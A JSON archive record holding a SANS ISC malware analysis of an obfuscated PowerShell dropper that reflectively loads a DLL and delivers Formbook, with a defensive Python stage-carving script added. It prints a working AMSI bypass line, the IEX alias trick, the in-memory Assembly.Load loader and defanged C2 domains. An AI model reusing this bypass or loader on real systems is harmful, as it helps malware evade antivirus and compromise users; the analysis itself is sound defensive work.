{
	"id": "db9b8094-adc2-406f-a51f-479c2be94837",
	"created_at": "2026-04-06T00:17:25.321891Z",
	"updated_at": "2026-04-10T03:21:53.514591Z",
	"deleted_at": null,
	"sha1_hash": "e173bb3f96f7098c5d1b4c4154813b77779b9f05",
	"title": "PowerShell Dropper Delivering Formbook - SANS ISC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1505140,
	"plain_text": "PowerShell Dropper Delivering Formbook - SANS ISC\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 16:29:20 UTC\r\nHere is an interesting PowerShell dropper that is nicely obfuscated and performs anti-VM checks. I spotted this file yesterday, called 'ad.jpg' (SHA256: b243e807ed22359a3940ab16539ba59910714f051034a8a155cc2aff28a85088). Of course, it's not a picture but a huge text file containing Base64-encoded data. The VT score is therefore not surprising: 0/61[1]. Once decoded, we discover the obfuscated PowerShell code. Let's review the techniques implemented by the attacker.\r\nFirst, we see this at the very beginning of the script:\r\n[Ref].Assembly.GetType('System.Management.Automation.'+$([CHAr]([Byte]0x41)+[ChAr]([bYTe]0x6D)+[Char](82+33)+[ChAr]([BYTe]0x69))+'Utils').GetField($([SyStEM.Net.WEBUTilItY]::htMLdeCode('\u0026#97;\u0026#109;\u0026#115;\u0026#105;\u0026#73;\u0026#110;\u0026#105;\u0026#116;\u0026#70;\u0026#97;\u0026#105;\u0026#108;\u0026#101;\u0026#100;')),'NonPublic,Static').SetValue($null,$true);\r\nThe type name is assembled from character codes (0x41, 0x6D, 82+33 and 0x69 spell 'Amsi') and the field name from HTML numeric entities decoded at runtime (they spell 'amsiInitFailed'), so neither string appears literally in the script. Deobfuscated, the line reads:\r\n[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);\r\nSetting the private static field amsiInitFailed to $true makes the PowerShell host believe that AMSI initialization failed, so nothing executed afterwards in that process is submitted to the antivirus engine for scanning. This piece of code comes from the PoSHBypass[2] project, a proof of concept that bypasses PowerShell's Constrained Language Mode, AMSI, and ScriptBlock and Module logging.\r\nThen, a classic: the Invoke-Expression cmdlet is obfuscated:\r\n$ZER0HRFGEPXLGAJHCZYNIFQKWXNPYMID='MEX'.replace('M','I');\r\nsal g $ZER0HRFGEPXLGAJHCZYNIFQKWXNPYMID;\r\nThe replace() call yields the string 'IEX', and sal (the built-in alias of Set-Alias) makes 'g' an alias of Invoke-Expression.
The alias g is used immediately to decode and execute the following chunk of data:\r\n[Byte[]]$IMAGE_NT_HEADERS=('@1F,@8B,@08,@00,@00,@00,@00,@00,@04,@00,@ED,@BD,@07,@60,@1C,@49,@96,@25,@26,@2F,\r\n@F5,@4A,@D7,@E0,@74,@A1,@08,@80,@60,@13,@24,@D8,@90,@40,@10,@EC,@C1,@88,@CD,@E6,@92,@EC,@1D,@69,@47,\r\n@23,@29,@AB,@2A,@81,@CA,@65,@56,@65,@5D,@66,@16,@40,@CC,@ED,@9D,@BC,@F7,@DE,@7B,@EF,@BD,@F7,@DE,@7B,\r\n@EF,@BD,@F7,@BA,@3B,@9D,@4E,@27,@F7,@DF,@FF,@3F,@5C,@66,@64,@01,@6C,@F6,@CE,@4A,@DA,@C9,@9E,@21,@80,\r\n...\r\n@34,@6F,@8F,@7E,@8D,@1F,@23,@18,@C7,@CC,@FF,@18,@F3,@84,@A0,@83,@EB,@FB,@70,@EE,@D3,@BB,@BB,@0A,@6B,\r\n@C7,@D2,@E4,@47,@CF,@FF,@B7,@9E,@5F,@E3,@E5,@AF,@43,@5C,@4C,@72,@77,@FF,@FF,@63,@78,@FF,@E8,@F9,@46,\r\n@9E,@FF,@07,@78,@61,@2A,@8D,@00,@42,@04,@00,@00'.replace('@','0x'))| g;\r\nEvery '@XX' token is turned into a 0xXX literal, and piping the resulting text to g (Invoke-Expression) evaluates the comma-separated list into a byte array. Its first bytes, 0x1F 0x8B 0x08, are the gzip magic number, which matches what happens next: the array is passed to the following function. The variable names (IMAGE_NT_HEADERS, PAGE_EXECUTE_READWRITE, CONTEXT_FULL) borrow Win32 constants but are just noise. The right margin of the listing was clipped in the capture; the truncated calls and the final output line are completed here from the names used elsewhere in the function:\r\nfunction JAPFYAQPECMKYQNLCJXCOFSVYMER {\r\n [CmdletBinding()]\r\n Param ([bYte[]] $VDLXLPBUCEUOIHNKREBMWCWEFMERbyteARRay)\r\n Process {\r\n $WRSWRLDCDXEUUYFBJUWQZJSDGMERiNput = New-Object System.IO.MemoryStream( , $VDLXLPBUCEUOIHNKREBMWCWEFMERbyteARRay)\r\n $MZCUMHEBORHYCNKFFBEUSZDTZMERouTPut = New-Object System.IO.MemoryStream\r\n $PHQDSFCPEMOPKRYRNBGRTBCCIMERPAGE_EXECUTE_READWRITE = New-Object System.IO.Compression.GzipStream $WRSWRLDCDXEUUYFBJUWQZJSDGMERiNput, ([System.IO.Compression.CompressionMode]::Decompress)\r\n $EONFFJPUIRZMNCRBQZKESIVGGMIDCONTEXT_FULL = New-Object bYtE[](1024)\r\n while($tRUe){\r\n $BBYRATZNTGIAUBPDRVBIQAMRDMERREread = $PHQDSFCPEMOPKRYRNBGRTBCCIMERPAGE_EXECUTE_READWRITE.Read($EONFFJPUIRZMNCRBQZKESIVGGMIDCONTEXT_FULL, 0, 1024)\r\n if ($BBYRATZNTGIAUBPDRVBIQAMRDMERREread -lE 0){bReAk}\r\n $MZCUMHEBORHYCNKFFBEUSZDTZMERouTPut.Write($EONFFJPUIRZMNCRBQZKESIVGGMIDCONTEXT_FULL, 0, $BBYRATZNTGIAUBPDRVBIQAMRDMERREread)\r\n }\r\n [bYte[]] $QTXDBVKLTJMGOACBLEIVSJSQHMIDouT = $MZCUMHEBORHYCNKFFBEUSZDTZMERouTPut.ToArray()\r\n $QTXDBVKLTJMGOACBLEIVSJSQHMIDouT\r\n }\r\n}\r\nIt gunzips the buffer and returns a DLL (SHA256: A7D74BE8AF1645FBECFC2FE915E0B77B287CE09AD3A7E220D20794475B0401F9), which was not present on VT at the time of writing.
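To recover the stages without executing the dropper, the following Python example (added here; it is not the diary's or the malware's code, and the helper names and the sample payload are constructed for it) parses a '@XX,...' array exactly as the replace() plus Invoke-Expression trick does, gunzips it when it starts with the gzip magic, and checks that what comes out has a DOS header whose e_lfanew points at a 'PE' signature. It handles both shapes the diary shows: a gzip-compressed stage and a raw MZ stage.

```python
import gzip
import hashlib
import io

# Added example (not from the diary): reproduce the dropper's staging offline.
# The dropper turns a '@1F,@8B,...' string into a byte array, gunzips it and
# reflectively loads the result; a later array is a raw PE. Helper names and
# the fake payload below are constructed for this example.

GZIP_MAGIC = bytes([0x1F, 0x8B, 0x08])
MZ_MAGIC = b'MZ'
PE_MAGIC = bytes([0x50, 0x45, 0x00, 0x00])  # 'PE' followed by two NUL bytes

def parse_at_hex_array(text: str) -> bytes:
    # Equivalent of ('@1F,@8B,...'.replace('@','0x')) | iex: every comma
    # separated token is one byte. Whitespace from wrapped lines is ignored.
    tokens = text.replace('@', '0x').split(',')
    return bytes(int(tok.strip(), 16) for tok in tokens if tok.strip())

def gunzip_stage(blob: bytes) -> bytes:
    # The dropper's decompression function without the noise: a GzipStream over
    # a MemoryStream, read in 1024-byte chunks until EOF.
    out = io.BytesIO()
    with gzip.GzipFile(fileobj=io.BytesIO(blob), mode='rb') as gz:
        while True:
            chunk = gz.read(1024)
            if not chunk:
                break
            out.write(chunk)
    return out.getvalue()

def looks_like_pe(blob: bytes) -> bool:
    # 'MZ' at offset 0 and e_lfanew (offset 0x3C) pointing at the PE signature.
    if len(blob) < 0x40 or blob[:2] != MZ_MAGIC:
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], 'little')
    return blob[e_lfanew:e_lfanew + 4] == PE_MAGIC

def carve_stage(text: str) -> dict:
    # Decode one '@..' array, gunzip it if it is gzip, and report what came out.
    raw = parse_at_hex_array(text)
    compressed = raw.startswith(GZIP_MAGIC)
    payload = gunzip_stage(raw) if compressed else raw
    return {
        'compressed': compressed,
        'is_pe': looks_like_pe(payload),
        'size': len(payload),
        'sha256': hashlib.sha256(payload).hexdigest(),
        'payload': payload,
    }

def fake_pe() -> bytes:
    # Constructed stand-in for the real DLL/EXE: a DOS header with e_lfanew = 0x80,
    # the usual stub text, then a PE signature and filler. Not a loadable image.
    stub = b'This program cannot be run in DOS mode.'
    dos = bytearray(0x80)
    dos[0:2] = MZ_MAGIC
    dos[0x3C:0x40] = (0x80).to_bytes(4, 'little')
    dos[0x40:0x40 + len(stub)] = stub
    return bytes(dos) + PE_MAGIC + bytes(64)

def to_at_hex_array(blob: bytes) -> str:
    # Encode bytes the way the dropper stores them, to build test input.
    return ','.join('@%02X' % b for b in blob)

# Stage 1 shape: gzip-compressed image. Stage 2 shape: raw PE.
STAGE1_TEXT = to_at_hex_array(gzip.compress(fake_pe()))
STAGE2_TEXT = to_at_hex_array(fake_pe())

if __name__ == '__main__':
    for name, text in (('stage1', STAGE1_TEXT), ('stage2', STAGE2_TEXT)):
        info = carve_stage(text)
        print(name, info['compressed'], info['is_pe'], info['size'], info['sha256'])
```

Feed carve_stage() the text between the quotes of each [Byte[]] assignment; the sha256 field is what to look up on VT, and the payload bytes can be written out for further analysis. Checking e_lfanew rather than only the two MZ bytes avoids being fooled by the DOS stub text alone.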
The resulting DLL never touches the disk: it is loaded straight from memory into the PowerShell process with Assembly.Load():\r\n[bYte[]]$decompressedByteArray = JAPFYAQPECMKYQNLCJXCOFSVYMER $IMAGE_NT_HEADERS\r\n$t=[System.Reflection.Assembly]::Load($decompressedByteArray)\r\nThen, another chunk of data is decoded in the same way:\r\n[Byte[]]$HNAUVVBGYKNXXMOTZHSTOHTKRMID=('@4D,@5A,@45,@52,@E8,@00,@00,@00,@00,@58,@83,@E8,@09,@8B,@C8,@83,@C0,\r\n@FF,@E1,@90,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,\r\n@00,@00,@00,@00,@00,@00,@C0,@00,@00,@00,@0E,@1F,@BA,@0E,@00,@B4,@09,@CD,@21,@B8,@01,@4C,@CD,@21,@54,@68,@69,\r\n@73,@20,@70,@72,@6F,@67,@72,@61,@6D,@20,@63,@61,@6E,@6E,@6F,@74,@20,@62,@65,@20,@72,@75,@6E,@20,@69,@6E,@20,\r\n...\r\n0,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@0\r\nThis one is not compressed: the first two bytes, 0x4D 0x5A, are the 'MZ' signature and the DOS stub text 'This program cannot be run in DOS mode' follows shortly after (0x54 0x68 0x69 0x73 ...), so we are looking at a PE file. The bytes at offset 4 (E8 00 00 00 00 58, a call to the next instruction followed by pop eax, the usual way to obtain the current address) also look like x86 code, which suggests the DOS header doubles as position-independent code, a trick often seen in reflectively loaded payloads. This is the main payload dropped by the PowerShell script (SHA256: A07AE0F8E715E243C514B8DA6FD83C5955E1C8EDE5EEBF4D6494EE97443AAD95). Same here, it was not available on VT yet.\r\nThe payload is executed via the following code:\r\n[QuotingUtilities]::SplitUnquoted('control.exe',$HNAUVVBGYKNXXMOTZHSTOHTKRMID)\r\nDespite its innocuous-looking name, this method is provided by the injected DLL, not by PowerShell (the decompiled code is shown as a screenshot in the original diary). Note the first argument, 'control.exe', the name of a legitimate Windows binary.\r\nThis function implements an interesting anti-VM check: if it detects a virtualized environment, it stops PowerShell and the payload is never executed (screenshot in the original diary).\r\nNote that I don't know why a popup message is displayed. The goal of malware is to operate below the radar...
(maybe the code is still being debugged by the attacker?)\r\nHere is how the VMware environment is detected (screenshot in the original diary):\r\n(Maybe there are other tests performed, but I did not investigate further.)\r\nThe DLL is also obfuscated with a tool that I had never come across before (screenshot in the original diary):\r\nIf you have more information about this \"Zephyrus Protector\" tool, please share it with me!\r\nThe Formbook sample tries to contact the following hosts:\r\nwww[.]zenhalklailiskiler[.]online\r\nwww[.]insights-for-instagram[.]com\r\nwww[.]ketaminetherapycalgary[.]com\r\nwww[.]forwardslashdevelopment[.]com\r\nwww[.]arikmertelsanatlari[.]xyz\r\nwww[.]bklynphotography[.]com\r\nwww[.]experiencewinneroftheyear[.]com\r\nwww[.]kansas-chiefs[.]com\r\nwww[.]vrefirsttime[.]com\r\nwww[.]issahclothing[.]com\r\nwww[.]denver-nuggets[.]club\r\nwww[.]wwwhookeze[.]com\r\nwww[.]moxieadvice[.]com\r\nwww[.]gangtayvietnam[.]com\r\nwww[.]cosmosguards[.]com\r\nwww[.]magentx2[.]info\r\n[1] https://www.virustotal.com/gui/file/b243e807ed22359a3940ab16539ba59910714f051034a8a155cc2aff28a85088/detection\r\n[2] https://github.com/davehardy20/PoSHBypass\r\nXavier Mertens (@xme)\r\nSenior ISC Handler - Freelance Cyber Security Consultant\r\nSource: https://isc.sans.edu/diary/26806",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://isc.sans.edu/diary/26806"
	],
	"report_names": [
		"26806"
	],
	"threat_actors": [],
	"ts_created_at": 1775434645,
	"ts_updated_at": 1775791313,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e173bb3f96f7098c5d1b4c4154813b77779b9f05.pdf",
		"text": "https://archive.orkl.eu/e173bb3f96f7098c5d1b4c4154813b77779b9f05.txt",
		"img": "https://archive.orkl.eu/e173bb3f96f7098c5d1b4c4154813b77779b9f05.jpg"
	}
}